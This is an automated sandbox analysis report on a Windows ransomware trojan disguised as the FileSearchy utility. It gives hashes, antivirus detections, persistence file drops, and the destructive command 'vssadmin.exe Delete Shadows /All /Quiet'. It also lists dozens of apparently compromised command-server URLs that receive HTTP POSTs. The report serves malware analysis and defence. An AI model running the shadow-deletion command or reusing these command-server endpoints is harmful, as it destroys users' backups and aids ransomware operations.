Analysis Date: 2015-10-28 07:47:39
MD5: dbd822d32ae388f7f331f8260ac4eead
SHA1: c4ed582710529904d1756afb113235888f90ed38

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 3c2d12f1507969549ff57b50bb5b9342 sha1: e5d246f212ff74a1d0461a02a3a94d324380e3d3 size: 120320
Section .rdata: md5: ebe8d195882207a9beedf0356a96a3dc sha1: a2e208dca488442d80c1ba906234692c671c1f70 size: 10240
Section .data: md5: 78ab43f3fa71271cdefd2bc11b8d017f sha1: c5287f0d8963bcd1e800dce0822488cfafa31cf2 size: 4096
Section .rsrc: md5: 438eac06861a4502fec0185ef5377d31 sha1: f85d56838fa7d7ed41d06d1534ef3f4da6e39e9a size: 109056
Timestamp: 2015-10-08 05:45:03
Version:
  LegalCopyright: Copyright (c) 2014 Midlinesoft
  ProductVersion: 1.22
  ProductName: FileSearchy
  FileVersion: 1, 2, 2, 0
  FileDescription: File search utility
Packer: Microsoft Visual C++ ?.?
PEhash: ec3e80098cfe040a4eb9c0506b0b645a2ebe8e63
IMPhash: 2001e00c523f6836b04d2393ff634251
AV CA (E-Trust Ino): no_virus
AV Rising: no_virus
AV Mcafee: Packed-FW!DBD822D32AE3
AV Avira (antivir): TR/Crypt.Xpack.293544
AV Twister: no_virus
AV Ad-Aware: Trojan.Lethic.Gen.9
AV Alwil (avast): Evo-gen [Susp]
AV Eset (nod32): Win32/Kryptik.DZUL
AV Grisoft (avg): Crypt_r.AAA
AV Symantec: Trojan.Gen
AV Fortinet: PossibleThreat.VEX.99
AV BitDefender: Trojan.Lethic.Gen.9
AV K7: Trojan ( 004d3b451 )
AV Microsoft Security Essentials: Trojan:Win32/Bagsu!rfn
AV MicroWorld (escan): Trojan.Lethic.Gen.9
AV MalwareBytes: Backdoor.Kasidet
AV Authentium: W32/Agent.XL.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.Win32.Crypt
AV Emsisoft: Trojan.Lethic.Gen.9
AV Zillya!: no_virus
AV Kaspersky: Trojan-Ransom.Win32.Cryptodef.zoy
AV Trend Micro: no_virus
AV CAT (quickheal): no_virus
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Trojan.Lethic.Gen.9
AV Arcabit (arcavir): Trojan.Lethic.Gen.9
AV ClamAV: no_virus
AV Dr. Web: Trojan.Encoder.514
AV F-Secure: Trojan.Lethic.Gen.9

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates File: C:\6ff06165\6ff06165.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process: vssadmin.exe Delete Shadows /All /Quiet
Creates Process: -k netsvcs

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: definitelymale.com
Winsock DNS: pimss.nl
Winsock DNS: dominamarketingporinternet.com
Winsock DNS: multylighting.com
Winsock DNS: nationautopart.com
Winsock DNS: aokvision.com
Winsock DNS: davidzollmusic.com
Winsock DNS: delgadillo.com.mx
Winsock DNS: bisvel.com
Winsock DNS: eclipsehair.com
Winsock DNS: comerentenerife.com
Winsock DNS: khanggiaorder.com
Winsock DNS: aok123.com
Winsock DNS: victoriaro.com
Winsock DNS: kanooneservat.com
Winsock DNS: curlmyip.com
Winsock DNS: almirot.com
Winsock DNS: healthyairmasters.com
Winsock DNS: breastaugmentationnow.com
Winsock DNS: bdcaindia.com
Winsock DNS: licenciaparaimprimirdinero.com
Winsock DNS: electjasonsmith.com
Winsock DNS: victoriaro.ru
Winsock DNS: gjimnazicambridge.com
Winsock DNS: wallpapers-hd.us
Winsock DNS: la.nonpac.com
Winsock DNS: jamiemeagher.com
Winsock DNS: myexternalip.com
Winsock DNS: waterdamagefortlauderdale.info
Winsock DNS: antistatikzeminkaplama.com
Winsock DNS: ip-addr.es
Winsock DNS: waterdamgespokane.us
Winsock DNS: clientes.autorepuestopalacios.com
Winsock DNS: hiringyou.us
Winsock DNS: metrshop.ru
Winsock DNS: demo.smointernational.com
Winsock DNS: extraescolaresdilosport.com
Winsock DNS: atlpvt.com
Winsock DNS: enbuscade.org
Winsock DNS: agsigh.com
Winsock DNS: furniturerowstores.com
Winsock DNS: leathertabi.net
Winsock DNS: leadershiptrifecta.com
Winsock DNS: pcgamingkeyboards.com
Winsock DNS: genedillardart.com
Winsock DNS: gettabletsnow.com
Winsock DNS: maestriaenalianzasestrategicas.com
Winsock DNS: suzuki.geringer.eu
Winsock DNS: hullukusagi.com
Winsock DNS: elcoachingempresarial.com
Winsock DNS: hcows.com
Winsock DNS: aster-toshiko.com
Winsock DNS: byteorders.com
Winsock DNS: albanianbakery.com
Winsock DNS: guessthesportsteam.com
Winsock DNS: dillardvideo.com
Winsock DNS: diputacion.ardinova.com
Winsock DNS: kodehelp.com
Winsock DNS: anxley.icodedark.com
Winsock DNS: meltemsatun.com
Winsock DNS: ikecotrina.com
Winsock DNS: glutenfreecafegirl.com
Winsock DNS: footbe.ru

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:

DNS: ip-addr.es, Type: A ➝ 188.165.164.184
DNS: myexternalip.com, Type: A ➝ 78.47.139.102
DNS: curlmyip.com, Type: A ➝ 184.106.112.172
DNS: demo.smointernational.com, Type: A ➝ 107.21.112.172
DNS: licenciaparaimprimirdinero.com, Type: A ➝ 198.245.61.209
DNS: waterdamgespokane.us, Type: A ➝ 192.69.235.197
DNS: ikecotrina.com, Type: A ➝ 81.169.145.95
DNS: multylighting.com, Type: A ➝ 192.254.233.64
DNS: guessthesportsteam.com, Type: A ➝ 108.179.232.170
DNS: la.nonpac.com, Type: A ➝ 192.185.16.153
DNS: antistatikzeminkaplama.com, Type: A ➝ 94.73.144.9
DNS: geringer.eu, Type: A ➝ 178.238.210.164
DNS: pcgamingkeyboards.com, Type: A ➝ 104.27.185.76
DNS: pcgamingkeyboards.com, Type: A ➝ 104.27.184.76
DNS: anxley.icodedark.com, Type: A ➝ 45.63.55.82
DNS: clientes.autorepuestopalacios.com, Type: A ➝ 37.187.140.111
DNS: gjimnazicambridge.com, Type: A ➝ 192.185.147.35
DNS: hullukusagi.com, Type: A ➝ 94.46.24.37
DNS: aok123.com, Type: A ➝ 112.124.180.85
DNS: hiringyou.us, Type: A ➝ 192.185.24.200
DNS: jamiemeagher.com, Type: A ➝ 204.13.11.31
DNS: footbe.ru, Type: A ➝ 5.101.153.11
DNS: maestriaenalianzasestrategicas.com, Type: A ➝ 198.57.149.47
DNS: dominamarketingporinternet.com, Type: A ➝ 198.57.149.47
DNS: leadershiptrifecta.com, Type: A ➝ 208.95.105.18
DNS: bdcaindia.com, Type: A ➝ 192.185.4.18
DNS: kanooneservat.com, Type: A ➝ 185.8.173.19
DNS: enbuscade.org, Type: A ➝ 5.196.22.116
DNS: agsigh.com, Type: A ➝ 103.21.59.28
DNS: khanggiaorder.com, Type: A ➝ 27.0.15.112
DNS: extraescolaresdilosport.com, Type: A ➝ 192.185.16.189
DNS: hcows.com, Type: A ➝ 192.145.239.17
DNS: waterdamagefortlauderdale.info, Type: A ➝ 192.69.235.197
DNS: atlpvt.com, Type: A ➝ 203.82.48.218
DNS: meltemsatun.com, Type: A ➝ 94.46.24.37
DNS: breastaugmentationnow.com, Type: A ➝ 50.87.144.185
DNS: elcoachingempresarial.com, Type: A ➝ 198.57.149.47
DNS: healthyairmasters.com, Type: A ➝ 66.96.160.134
DNS: bisvel.com, Type: A ➝ 192.185.72.101
DNS: davidzollmusic.com, Type: A ➝ 208.95.105.18
DNS: nationautopart.com, Type: A ➝ 192.145.239.17
DNS: comerentenerife.com, Type: A ➝ 5.196.22.116
DNS: wallpapers-hd.us, Type: A ➝ 104.28.18.8
DNS: wallpapers-hd.us, Type: A ➝ 104.28.19.8
DNS: albanianbakery.com, Type: A ➝ 205.186.129.63
DNS: diputacion.ardinova.com, Type: A ➝ 37.187.140.111
DNS: kodehelp.com, Type: A ➝ 104.131.74.68
DNS: definitelymale.com, Type: A ➝ 64.74.223.42
DNS: victoriaro.ru, Type: A ➝ 5.101.152.31
DNS: eclipsehair.com, Type: A ➝ 107.21.112.172
DNS: victoriaro.com, Type: A ➝ 5.101.152.31
DNS: byteorders.com, Type: A ➝ 208.95.105.18
DNS: delgadillo.com.mx, Type: A ➝ 198.57.149.47
DNS: dillardvideo.com, Type: A ➝ 69.89.21.66
DNS: aokvision.com, Type: A ➝ 112.124.180.85
DNS: gettabletsnow.com, Type: A ➝ 50.87.144.185
DNS: genedillardart.com, Type: A ➝ 69.89.21.66
DNS: almirot.com, Type: A ➝ 5.196.22.116
DNS: aster-toshiko.com, Type: A ➝ 49.212.235.27
DNS: furniturerowstores.com, Type: A ➝ 108.179.232.170
DNS: glutenfreecafegirl.com, Type: A ➝ 192.185.35.62
DNS: electjasonsmith.com, Type: A ➝ 107.180.50.171
DNS: suzuki.geringer.eu, Type: A
DNS: pimss.nl, Type: A
DNS: metrshop.ru, Type: A
DNS: leathertabi.net, Type: A
HTTP GET: http://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://demo.smointernational.com/2.php?x=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://licenciaparaimprimirdinero.com/magaly/wp-admin/css/3.php?u=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://waterdamgespokane.us/wp-content/cache/supercache/waterdamgespokane.us/2014/08/1.php?j=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://ikecotrina.com/wp-includes/theme-compat/3.php?o=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://multylighting.com/demo/wp-content/plugins/js_composer/assets/lib/bower/flexslider/4.php?s=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://guessthesportsteam.com/wp-content2/plugins/backupbuddy/views/settings/3.php?g=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://la.nonpac.com/img/3.php?k=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://antistatikzeminkaplama.com/wp-includes/theme-compat/1.php?p=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://suzuki.geringer.eu/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/5.php?z=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://pcgamingkeyboards.com/wp-content/plugins/wordpress-seo/vendor/composer/installers/tests/Composer/5.php?b=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://anxley.icodedark.com/wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/5.php?i=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://clientes.autorepuestopalacios.com/images/articulos/2.php?p=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://gjimnazicambridge.com/OLD%20FILES/new-site/images/3.php?o=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://hullukusagi.com/wp-includes/SimplePie/Net/3.php?x=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://aok123.com/gsqgu/.f6e2634/1.php?e=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://hiringyou.us/wp-content/plugins/js_composer/assets/lib/nivoslider/themes/light/4.php?w=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://jamiemeagher.com/nextgen-gallery/products/photocrati_nextgen/modules/wpcli/3.php?w=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://footbe.ru/wp-content/plugins/wp-super-popup/tiny_mce/themes/advanced/skins/o2k7/4.php?c=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://maestriaenalianzasestrategicas.com/wp-admin/user/3.php?v=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://dominamarketingporinternet.com/wp-admin/user/2.php?x=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://leadershiptrifecta.com/3.php?u=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://bdcaindia.com/wp-includes/Text/Diff/Engine/1.php?a=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://kanooneservat.com/wp-content/plugins/js_composer/assets/lib/vcIconPicker/themes/grey-theme/5.php?v=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://enbuscade.org/documentos/2014/05/3.php?u=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://agsigh.com/wos/js/1.php?y=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://khanggiaorder.com/wp-includes/SimplePie/Cache/3.php?y=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://extraescolaresdilosport.com/wp-includes/SimplePie/Decode/HTML/3.php?s=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://hcows.com/3.php?q=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://waterdamagefortlauderdale.info/wp-content/cache/1.php?v=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://atlpvt.com/wp-includes/Text/Diff/1.php?t=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://meltemsatun.com/wp-includes/SimplePie/Net/3.php?r=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://breastaugmentationnow.com/wp-content/plugins/contact-form-7/languages/2.php?l=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://elcoachingempresarial.com/wp-admin/user/2.php?v=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://healthyairmasters.com/Demo_Preliminar_helths/wc-logs/3.php?f=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://bisvel.com/media/media/css/1.php?p=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://davidzollmusic.com/.f622361ee0b4be53991dffe21b5a361f/b/a/2.php?k=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://nationautopart.com/1.php?z=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://comerentenerife.com/wp-content/plugins/post-ratings/templates/2.php?d=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://wallpapers-hd.us/wp-content/plugins/wordpress-seo/vendor/xrstf/composer-php52/lib/xrstf/4.php?o=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://albanianbakery.com/wiki/dll/1.php?j=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://diputacion.ardinova.com/wp-admin/images/screenshots/2.php?f=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://kodehelp.com/wp-includes/certificates/3.php?h=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://definitelymale.com/wp-content/cache/supercache/definitelymale.com/2.php?z=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://victoriaro.ru/wp-content/plugins/tubepress/src/main/web/js/jscolor/4.php?w=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://eclipsehair.com/2.php?r=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://victoriaro.com/wp-content/themes/hueman/option-tree/assets/js/vendor/jquery/4.php?s=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://byteorders.com/2.php?t=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://delgadillo.com.mx/himnofjr/2.php?s=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://dillardvideo.com/wp-admin/network/2.php?x=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://aokvision.com/gsqgu/.f6e2634/1.php?k=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://gettabletsnow.com/wp-content/pep-vn/static-vars/3.php?b=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://genedillardart.com/wp-admin/network/3.php?d=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://almirot.com/wp-content/uploads/1.php?i=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://aster-toshiko.com/parts/org/1.php?o=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://furniturerowstores.com/wp-content/plugins/backupbuddy/backupbuddy/views/settings/3.php?i=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://glutenfreecafegirl.com/wp-admin/user/3.php?l=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POST: http://electjasonsmith.com/wp-content/plugins/wp-hide-post/2.php?u=h368201gjuk0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP: 192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP: 192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP: 192.168.1.1:1034 ➝ 107.21.112.172:80
Flows TCP: 192.168.1.1:1035 ➝ 198.245.61.209:80
Flows TCP: 192.168.1.1:1036 ➝ 192.69.235.197:80
Flows TCP: 192.168.1.1:1037 ➝ 81.169.145.95:80
Flows TCP: 192.168.1.1:1038 ➝ 192.254.233.64:80
Flows TCP: 192.168.1.1:1039 ➝ 108.179.232.170:80
Flows TCP: 192.168.1.1:1040 ➝ 192.185.16.153:80
Flows TCP: 192.168.1.1:1041 ➝ 94.73.144.9:80
Flows TCP: 192.168.1.1:1042 ➝ 178.238.210.164:80
Flows TCP: 192.168.1.1:1043 ➝ 104.27.185.76:80
Flows TCP: 192.168.1.1:1044 ➝ 45.63.55.82:80
Flows TCP: 192.168.1.1:1045 ➝ 37.187.140.111:80
Flows TCP: 192.168.1.1:1046 ➝ 192.185.147.35:80
Flows TCP: 192.168.1.1:1047 ➝ 94.46.24.37:80
Flows TCP: 192.168.1.1:1048 ➝ 112.124.180.85:80
Flows TCP: 192.168.1.1:1049 ➝ 192.185.24.200:80
Flows TCP: 192.168.1.1:1050 ➝ 204.13.11.31:80
Flows TCP: 192.168.1.1:1051 ➝ 5.101.153.11:80
Flows TCP: 192.168.1.1:1052 ➝ 198.57.149.47:80
Flows TCP: 192.168.1.1:1053 ➝ 198.57.149.47:80
Flows TCP: 192.168.1.1:1054 ➝ 208.95.105.18:80
Flows TCP: 192.168.1.1:1055 ➝ 192.185.4.18:80
Flows TCP: 192.168.1.1:1056 ➝ 185.8.173.19:80
Flows TCP: 192.168.1.1:1057 ➝ 5.196.22.116:80
Flows TCP: 192.168.1.1:1058 ➝ 103.21.59.28:80
Flows TCP: 192.168.1.1:1059 ➝ 27.0.15.112:80
Flows TCP: 192.168.1.1:1060 ➝ 192.185.16.189:80
Flows TCP: 192.168.1.1:1061 ➝ 192.145.239.17:80
Flows TCP: 192.168.1.1:1062 ➝ 192.69.235.197:80
Flows TCP: 192.168.1.1:1063 ➝ 203.82.48.218:80
Flows TCP: 192.168.1.1:1064 ➝ 94.46.24.37:80
Flows TCP: 192.168.1.1:1065 ➝ 50.87.144.185:80
Flows TCP: 192.168.1.1:1066 ➝ 198.57.149.47:80
Flows TCP: 192.168.1.1:1067 ➝ 66.96.160.134:80
Flows TCP: 192.168.1.1:1068 ➝ 192.185.72.101:80
Flows TCP: 192.168.1.1:1069 ➝ 208.95.105.18:80
Flows TCP: 192.168.1.1:1070 ➝ 192.145.239.17:80
Flows TCP: 192.168.1.1:1071 ➝ 5.196.22.116:80
Flows TCP: 192.168.1.1:1072 ➝ 104.28.18.8:80
Flows TCP: 192.168.1.1:1073 ➝ 205.186.129.63:80
Flows TCP: 192.168.1.1:1074 ➝ 37.187.140.111:80
Flows TCP: 192.168.1.1:1075 ➝ 104.131.74.68:80
Flows TCP: 192.168.1.1:1076 ➝ 64.74.223.42:80
Flows TCP: 192.168.1.1:1077 ➝ 5.101.152.31:80
Flows TCP: 192.168.1.1:1078 ➝ 107.21.112.172:80
Flows TCP: 192.168.1.1:1079 ➝ 5.101.152.31:80
Flows TCP: 192.168.1.1:1080 ➝ 208.95.105.18:80
Flows TCP: 192.168.1.1:1081 ➝ 198.57.149.47:80
Flows TCP: 192.168.1.1:1082 ➝ 69.89.21.66:80
Flows TCP: 192.168.1.1:1083 ➝ 112.124.180.85:80
Flows TCP: 192.168.1.1:1084 ➝ 50.87.144.185:80
Flows TCP: 192.168.1.1:1085 ➝ 69.89.21.66:80
Flows TCP: 192.168.1.1:1086 ➝ 5.196.22.116:80
Flows TCP: 192.168.1.1:1087 ➝ 49.212.235.27:80
Flows TCP: 192.168.1.1:1088 ➝ 108.179.232.170:80
Flows TCP: 192.168.1.1:1089 ➝ 192.185.35.62:80
Flows TCP: 192.168.1.1:1090 ➝ 107.180.50.171:80